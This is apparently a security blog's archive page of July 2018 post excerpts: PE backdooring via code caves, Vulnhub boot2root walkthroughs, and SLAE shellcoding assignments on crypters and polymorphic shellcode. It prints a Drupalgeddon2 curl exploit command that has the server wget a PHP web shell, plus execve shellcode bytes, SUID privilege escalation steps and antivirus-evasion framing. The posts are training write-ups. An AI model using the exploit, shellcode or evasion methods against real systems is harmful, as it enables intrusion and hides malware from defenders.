Skip to main content


Showing posts from July, 2018

Backdoring PE files using code caves : OSCE/CTP Module 0x03 (OSCE Preparation)

Hello Readers, This post will cover Backdooring of P.E file by using code caves . There are already good tools to do this for you eg. Backdoor Factory and Shelter which will do the same job and even bypass some static analysis of few antiviruses . I will be covering the manual approach of backdooring a PE file . Let's understand some terms : [x] PE file : The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems. [x] Code Cave : Wikipedia says - "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code’s script functions that have capacity for the injection of custom instructions. For example, if a script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script." [x] Shellcode : Wikipedia - &qu

Toppo 1 Walkthrough - Vulnhub Machine

Hello Friends, This is my second write-up on a vuln machine Toppo 1 made by my bro Hadi Mene. Let's get Started .... After running nmap for the target machine , I found port 80 was open so I started enumerating from there. The first thing I try for any web app based challenge is - Running Dirbuster ;) Found an interesting file i.e notes.txt . Let's check it out in browser . Great, we got some password. It can be ssh credential or ftp etc. Since ftp port is closed therefore let's go for ssh login . Tried ted123 and ted as username . Luckily "ted" worked for me . So username - ted pass- 1234ted123 Now comes the privilege escalation part . This was the easiest part since this covers the basics of privilege escalations through SUID. I checked for the binaries whose setuid were enabled . setuid bit- Binaries with the setuid bit enabled, are being executed as if they were running under the context of the root user.  That moment when you see

Billu b0x 2 Walkthrough - Vulnhub Machine

Hello Friends, This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar . This machine is based on latest vulnerability of Drupal CMS. Let's get started ... Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt. The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl. I used following command to download a php web shell - curl -s -X 'POST'   --data 'mail[%23post_render][]=exec&mail[%23children]='"wget"'&form_id=user_register_form'   '' | cut -d ":" -f5 Through php shell , I got

Custom Crypter x86 - SLAE Assignment 0x7

Before we start , I would like to bring your attention to this SLAE course from securitytube which will help you learn Shellcoding - AGENDA  : 1. Write encryption and decryption algorithm using high level language 2. Test encryption algorithm on shellcode 3. Verify decryption algorithm on encrypted shellcode I have used C# language and made a window based gui application in order to encrypt and decrypt shellcode using AES encryption schema. Crypter : A crypter is a program which encrypts the shellcode (in our case) so that anti-virus evasion can be done and has a module called decrypter which decrypts and execute the original shellcode. I will use execve shellcode and encrypt,decrypt it using our newly made custom crypter. execve Shellcode :  Extracted shellcode - "\x31\xdb\xf7\xe3\x04\x0b\x53\x53\x59\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" C# code

Polymorphic Shellcode x86 - SLAE Assignment 0x6

Before we start , I would like to bring your attention to this SLAE course from securitytube which will help you learn Shellcoding - AGENDA  :   1. Introduction to Polymorphic Shellcode 2. Create a new version (polymorphic) of an existing shellcode taken from 3. Newer version of shellcode should not be more than 150% of the original code 1.  Introduction to Polymorphic Shellcode: We replace assembly instructions with other equivalent assembly instructions in order to defeat signature based systems and the functionality of the shellcode remains intact. For example, the following assembly code snippet should give you an idea of what this means: xor eax,eax xor edx,edx This simply empty/zeroout eax and edx . Exactly the same functionality could be achieved by using: sub eax,eax cdq 2.  Create a new version (polymorphic) of an existing shellcode taken from www.she